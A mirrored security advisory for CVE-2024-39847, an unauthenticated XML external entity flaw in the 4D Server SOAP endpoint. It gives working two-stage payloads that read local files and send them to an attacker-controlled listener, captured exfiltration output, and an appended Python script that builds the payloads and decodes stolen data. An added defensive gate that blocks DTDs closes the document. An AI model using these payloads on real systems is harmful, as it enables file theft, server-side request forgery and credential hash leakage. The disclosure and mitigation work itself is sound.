4D Server Server-Side Request Forgery / Arbitrary File Read
Packet Storm ID: PACKETSTORM:221283, https://packetstorm.news/files/id/221283/ (download: https://packetstorm.news/download/221283), published 2026-05-18
CVE: CVE-2024-39847
CVSS 4.0: 8.7 HIGH, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N/AU:Y
Mirrored at https://zero.redgem.net/?p=55365 on 2026-05-18

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Arbitrary File Read and Server Side Request Forgery via XML External Entities in 4D Server SOAP
===============================================================================================

Unauthenticated attackers can exploit a weakness in the XML parser used by the SOAP endpoints of 4D Server. This allows them to obtain read access to files on the application server and on adjacent network shares, and to perform HTTP GET requests to arbitrary services.

Metadata
========

- Affected product: 4D Server
- Affected version: v20 R3
- Vendor: 4D
- Problem type(s): CWE-611 Improper Restriction of XML External Entity Reference
- CVE ID: CVE-2024-39847
- CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-39847
- CVSS 4.0 score: 8.7
- Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/

Details
=======

During a recent external penetration test, an application based on the 4D development platform[0] was examined. 4D Server is a component of the 4D suite and acts as the database and application server, serving mobile and desktop clients. SCHUTZWERK identified an arbitrary file read vulnerability via XML external entities in the SOAP endpoint(s) of 4D Server.

Sending the following payload to the /4DSOAP endpoint showed that the application resolves external XML entities: the resulting request was observed on the attacker-controlled server.

<!DOCTYPE foo [
 <!ENTITY % test SYSTEM "http://attacker.tld">
 %test;
]>

After setting up a local 4D Server instance, SCHUTZWERK was able to confirm that the vulnerability is present in the latest version of 4D Server (20 R3 at the time of writing). Additionally, SCHUTZWERK found that the vulnerability is exploitable even if "Reject SOAP-Requests" is set in the 4D Server GUI; that setting does not prevent the parser from processing the request body.

Further testing revealed that a combination of error-based and out-of-band exfiltration techniques can be used to read arbitrary files on the application server's file system and on adjacent network shares, as well as to perform HTTP requests to arbitrary URLs. This requires a Document Type Definition (DTD) file loaded from an attacker-controlled server and can be demonstrated with the following payloads:

Stage 1: XML body sent to the /4DSOAP endpoint

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % stage1 SYSTEM "http://192.168.56.1:2121/stage.dtd">
  %stage1;
]>

Stage 2: DTD file returned by http://192.168.56.1:2121/stage.dtd

<!ENTITY % fileb SYSTEM "file:///c:\Users\john.doe\Desktop\secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '%fileb;'>">
%eval;
%exfiltrate;

Expanding %eval; declares a second parameter entity, exfiltrate, whose SYSTEM identifier is the content of secret.txt (the &#x25; character reference is needed so that the inner percent sign survives until that point). Expanding %exfiltrate; then makes the parser treat that content as a URL, resolve it relative to the DTD's base URL and request it from the attacker's server.

Server response for the request sent to the /4DSOAP endpoint:

<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>
                <faultstring>error at line 6, column 1: invalid document structure
</faultstring>
        </SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The fault itself looks harmless: the parser only complains that no root element follows the DTD. By the time it reaches line 6, however, it has already fetched stage.dtd and the target file, as the requests sent to the attacker-controlled server (192.168.56.1:2121) show:

192.168.56.114 - - "GET /stage.dtd HTTP/1.1" 200 -
192.168.56.114 - - "GET /my%20secret%20message%0D%0Ais%20super%20secret%0D%0Aand%20secure HTTP/1.1" 200 -

Depending on the file contents, the HTTP request for the exfiltrate entity may fail. On the local test instance of 4D Server (set up by creating a new, empty 4D application project) this was the case for files containing a hash sign (#). Because the file content is resolved as a URL relative to the DTD's base, the parser then cannot open the resulting URL and quotes it, file contents included, in the /4DSOAP endpoint's fault message:

<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>
                <faultstring>error at line 5, column 13: unable to open external entity 'http://192.168.56.1:2121/# my secret website
- http:/secret.tld/bar'
</faultstring>
        </SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

For some file contents, neither of these methods will succeed. Depending on the application, exfiltration could still be achieved through application-specific SOAP functions that accept data tags.

The script 4d-xxe.py[1] was developed to aid automated exploitation. It uses Flask[2] to start an exfiltration server on port 2121 and a query endpoint on port 1337. Once started, files can be requested by issuing a GET request to

http://127.0.0.1:1337/<target URI>

which sends the appropriate XML payload to obtain the specified resource. In the following run the target was asked to fetch http://192.168.56.114, i.e. its own 4D Web Server, and the default home page came back inside the fault string:

$ curl '127.0.0.1:1337/http://192.168.56.114'
<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>
                <faultstring>error at line 5, column 13: unable to connect socket for URL 'http://192.168.56.1:2121/<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
[...]
      <td class="grayborder">
        <h2 align="center">Welcome to your 4D Web Server default home
          page!</h2>
        <p align="center">This is the <strong><b>4D Web Server</b></strong>
          default home page. This <strong>test page</strong> is served by 4D
          Application.</p>
        <p align="center">If you are the webmaster, congratulations! Your Web
          server is up and running. You are seeing this page because you have
          not yet replaced the default "index.html" file with your actual
          home page.</p>
        <p align="center">Instructions for configuring your 4D Web
          Server can be found in the included documentation.</p>
        <p align="center"><b>IMPORTANT</b>: This Web page or Web site is neither
          owned nor administered by 4D SAS or any of its subsidiaries. Please contact
          the owner/webmaster of this site to report any problems with it.</p>
        <p align="center">&copy;1995-2024 4D, Inc., 4D SAS and its Licensors.<br>
          All rights reserved.</p>
       </td>
[...]
</html>
'
</faultstring>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Because the query endpoint turns a plain GET into the full XXE round trip, any web directory enumeration tool pointed at it can be used to exfiltrate files and/or perform "proxied" HTTP requests through the 4D Server.

Risk
====

An attacker can use the vulnerability to gather information and, depending on the stored data, exfiltrate secrets from the file system and from adjacent SMB shares. Furthermore, the HTTP requests can be used for out-of-band exfiltration and server-side request forgery (SSRF) attacks. Using the SMB protocol (a UNC path as the entity's SYSTEM identifier) could also leak the NTLM or SSP hash of the account running 4D Server to an attacker-controlled share.

Solution/Mitigation
===================

Update to 4D Server 20 R7 or higher.

Timeline
========

- 2024-06-17 Vulnerability discovered
- 2024-06-24 Attempt to contact vendor, no response received
- 2024-06-25 CVE ID requested
- 2024-06-29 CVE-2024-39847 assigned
- 2024-07-04 Attempt to contact vendor again, no response received
- 2024-07-09 Attempt to contact vendor again, no response received
- 2024-07-16 Attempt to contact vendor again, no response received
- 2024-07-22 Attempt to contact vendor again, no response received
- 2026-04-29 Advisory published

Credits
=======

The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.

Footnotes
=========

[0] https://4d.com
[1] https://www.schutzwerk.com/blog/schutzwerk-sa-2024-002/4d-xxe.py
[2] https://flask.palletsprojects.com/en/stable/
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnyGKIaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrs6TQ//Vp4Ts1sg8wUOx5V46ttU
OkErEUSrMqHDCrxiLKLsYoBBXyqPB+oKLzWFkMTUxbq+W7aqJIVG6EMeBsu1FCae
0JfGA0MYYJ4s7WcphN/QqqU+e35r0NfPAzcKlr861ZNcwcy9vbg/WP+z1AlTfH9X
MBKtv4Z2R1xpFq2sAJnwOw3E7Cl5g40PSsTJhI52/O7M4K5rB14EjFXW/hHgSFNz
ESUI+o/U1t7nPDulxfSsVmvbDTuvmxrs1xM/ulMYoKFKSueEglNCmF+5i/lFs7LF
rM0PZLGCbMR9z2NOeEk+dGwCztXpY2KN1KvPWYt4flvxZzlnWFWCzrVog8QdDhbV
CAfeLi+5krzgsZIPfphYpHc2BYJdAGsHDZx76GxoMNi8/miHX15+vg3N7SBPopOG
aIWnPJX0LCoecdzELJhzpOSYpzLTurRKnPU6y4sa/gJN4K99gCbE2HpPIJRaJmJG
hk7iwTUA11ijiEWpKCWX3hE3dhxY9WgKKoKe/CtGZkaEoEa1ePTPUFWhiwORpSsa
AV3i7YZOgjBiEj4ffBfy+Z/3fHhR7S3fWpFUhWeyb2jjx6OuJSG4g9az6Uze0hZG
vYn40CIpG2sHlm1PzQBzMUopqjmaW+FMyLgv8XOsnfdqg7UqPJ0LKmNAtafO1tVo
HH0qazSkyWNwZlaLr5YYUso=
=MhKk
-----END PGP SIGNATURE-----

-- 
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer

Amtsgericht (Local Court) Ulm / HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz
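The two-stage payload from the Details section, and the two ways the advisory reads the result back (the listener's access log for the out-of-band case, the SOAP fault string when the content could not be turned into a request), as an added example. This is not the advisory's 4d-xxe.py and not 4D's code; the listener address 192.168.56.1:2121 follows the advisory, the log lines and fault response are constructed to match its output, and the function names are mine.

```python
"""
Two-stage XXE exfiltration against a CWE-611 SOAP endpoint such as the
4D Server /4DSOAP endpoint in this advisory.  Added example, not the
advisory's 4d-xxe.py.  Listener address and samples are constructed.
"""
import re
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import unquote

# Assumed attacker-controlled listener serving stage.dtd (as in the advisory).
DTD_BASE = "http://192.168.56.1:2121/"
DTD_URL = DTD_BASE + "stage.dtd"


def build_stage1(dtd_url: str = DTD_URL) -> str:
    """Stage 1: body POSTed to /4DSOAP.  It only declares and expands an
    external parameter entity; the parser must fetch the DTD to continue.
    No root element follows: by the time the parser reports that, every
    fetch has already happened."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY % stage1 SYSTEM "{dtd_url}">\n'
        "  %stage1;\n"
        "]>\n"
    )


def build_stage2_dtd(target_uri: str) -> str:
    """Stage 2: the DTD served from DTD_BASE.
    %fileb is the resource to read: file:///..., http://... (SSRF) or a
    UNC path to an adjacent share.  The value of %eval is itself an entity
    declaration; '%fileb;' inside it is expanded first, so the declared
    entity's SYSTEM identifier *is* the fetched content.  '&#x25;' stands
    in for '%' so the inner percent sign survives until %eval; is expanded.
    Expanding %exfiltrate; makes the parser resolve that content as a URL
    relative to this DTD's base and request it from the listener."""
    return (
        f'<!ENTITY % fileb SYSTEM "{target_uri}">\n'
        "<!ENTITY % eval \"<!ENTITY &#x25; exfiltrate SYSTEM '%fileb;'>\">\n"
        "%eval;\n"
        "%exfiltrate;\n"
    )


# Channel 1, out-of-band: the content arrives percent-encoded as the request
# path in the listener's access log (space -> %20, CRLF -> %0D%0A).
_LOG_RE = re.compile(r'"GET (?P<path>/\S*) HTTP/1\.[01]"')


def decode_oob_request(log_line: str) -> Optional[str]:
    """Recover exfiltrated content from one access-log line; None for lines
    that are not exfiltration hits (e.g. the stage.dtd fetch itself)."""
    m = _LOG_RE.search(log_line)
    if not m or m.group("path") == "/stage.dtd":
        return None
    return unquote(m.group("path")[1:])


# Channel 2, error-based: when the content cannot be requested (the advisory's
# example is a '#', which starts a URL fragment), the fault string quotes the
# URL the parser could not open, which is DTD_BASE + content.
def decode_fault(soap_xml: str, base_url: str = DTD_BASE) -> Optional[str]:
    # ElementTree's expat backend does not fetch external entities, so
    # parsing the *response* here is safe even though the topic is XXE.
    root = ET.fromstring(soap_xml.encode("utf-8"))
    fault = root.find(".//faultstring")
    if fault is None or not fault.text:
        return None
    m = re.search(r"'(?P<url>.*)'\s*$", fault.text, re.S)
    if not m:
        return None
    url = m.group("url")
    return url[len(base_url):] if url.startswith(base_url) else url


def read_back(log_text: str, fault_xml: str) -> list:
    """Merge both channels: OOB hits from the log, then the fault's content."""
    hits = [h for h in (decode_oob_request(l) for l in log_text.splitlines()) if h]
    err = decode_fault(fault_xml)
    if err:
        hits.append(err)
    return hits


# Constructed samples, modelled on the advisory's listener log and fault response.
SAMPLE_LOG = (
    '192.168.56.114 - - "GET /stage.dtd HTTP/1.1" 200 -\n'
    '192.168.56.114 - - "GET /my%20secret%20message%0D%0Ais%20super%20secret'
    '%0D%0Aand%20secure HTTP/1.1" 200 -\n'
)
SAMPLE_FAULT = """<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
  <SOAP-ENV:Fault>
    <faultcode>SOAP-ENV:Client</faultcode>
    <faultstring>error at line 5, column 13: unable to open external entity 'http://192.168.56.1:2121/# my secret website
- http:/secret.tld/bar'
</faultstring>
  </SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""

if __name__ == "__main__":
    print(build_stage1())
    print(build_stage2_dtd(r"file:///c:\Users\john.doe\Desktop\secret.txt"))
    for hit in read_back(SAMPLE_LOG, SAMPLE_FAULT):
        print(repr(hit))
```

The listener that serves build_stage2_dtd() and records the access log is left out; any HTTP server that logs request paths will do, which is why the advisory's tool can sit behind an ordinary directory enumeration tool. Line-ending bytes survive the round trip only as long as the content stays a valid relative URL, so a first probe against a file of known content is the quickest way to learn which of the two channels a given target will use.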
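Since the "Reject SOAP-Requests" setting did not stop the parser, an operator who cannot move to 20 R7 immediately needs a check in front of /4DSOAP that never lets a DTD reach it. The following is an added example of such a pre-parse gate, not 4D's code: it decodes the body the way an XML parser would (BOM, then UTF-16 sniffing) so that a payload re-encoded as UTF-16 cannot slip past a byte-level substring match. SOAP 1.1 forbids a Document Type Declaration in a SOAP message, so rejecting every DOCTYPE breaks no legitimate client. The sample bodies and function names are constructed for this example.

```python
"""
Pre-parse gate for SOAP bodies: refuse any request that carries a Document
Type Declaration before the XML parser sees it.  Added example for the
"Reject SOAP-Requests does not help" finding; not 4D's code.
"""
import re

# SOAP 1.1 section 3: a SOAP message MUST NOT contain a DOCTYPE, so a DTD is
# never legitimate here and the gate can fail closed.  ENTITY is matched too
# in case a declaration is smuggled in without the DOCTYPE keyword intact.
_DTD_MARKER = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.I)

_BOMS = (
    (b"\xef\xbb\xbf", "utf-8"),
    (b"\xff\xfe", "utf-16-le"),
    (b"\xfe\xff", "utf-16-be"),
)


def _decode_for_inspection(body: bytes) -> str:
    """Decode the body the way the parser will, so that '<!DOCTYPE' written
    as UTF-16 is still seen.  Unknown encodings fall back to UTF-8 with
    replacement characters; the regex still works on the ASCII keywords."""
    for bom, enc in _BOMS:
        if body.startswith(bom):
            return body[len(bom):].decode(enc, errors="replace")
    if body[:2] == b"<\x00":          # '<' in UTF-16-LE without a BOM
        return body.decode("utf-16-le", errors="replace")
    if body[:2] == b"\x00<":          # '<' in UTF-16-BE without a BOM
        return body.decode("utf-16-be", errors="replace")
    return body.decode("utf-8", errors="replace")


def has_dtd(body: bytes) -> bool:
    """True if the body contains a DOCTYPE or ENTITY declaration.  The match
    is case-insensitive and also fires on the keywords inside comments or
    CDATA; for a gate in front of a vulnerable parser that false positive
    is the safe direction."""
    return _DTD_MARKER.search(_decode_for_inspection(body)) is not None


def gate_soap_body(body: bytes) -> tuple:
    """Decision a reverse proxy or WAF rule in front of /4DSOAP would make.
    Returns (accept, reason)."""
    if has_dtd(body):
        return False, "DTD not permitted in SOAP messages"
    return True, "ok"


# Constructed samples: the advisory's stage-1 payload in several encodings,
# and a benign SOAP call that must pass.
STAGE1 = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b"<!DOCTYPE foo [\n"
    b'  <!ENTITY % stage1 SYSTEM "http://192.168.56.1:2121/stage.dtd">\n'
    b"  %stage1;\n"
    b"]>\n"
)
STAGE1_UTF16 = STAGE1.decode("utf-8").encode("utf-16")          # BOM + native order
STAGE1_UTF16BE_NOBOM = STAGE1.decode("utf-8").encode("utf-16-be")
BENIGN = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">\n'
    b"<SOAP-ENV:Body><GetStatus/></SOAP-ENV:Body>\n"
    b"</SOAP-ENV:Envelope>\n"
)

if __name__ == "__main__":
    for name, body in (("stage1", STAGE1), ("stage1 utf-16", STAGE1_UTF16),
                       ("stage1 utf-16-be", STAGE1_UTF16BE_NOBOM), ("benign", BENIGN)):
        print(name, gate_soap_body(body))
```

The gate is a stopgap for the request side only. The advisory's second impact, outbound HTTP and SMB connections initiated by the parser, is best addressed at the same time by denying the 4D Server host egress to anything it does not need, so that even a bypass cannot reach an attacker's listener or leak the service account's NTLM hash to a rogue share.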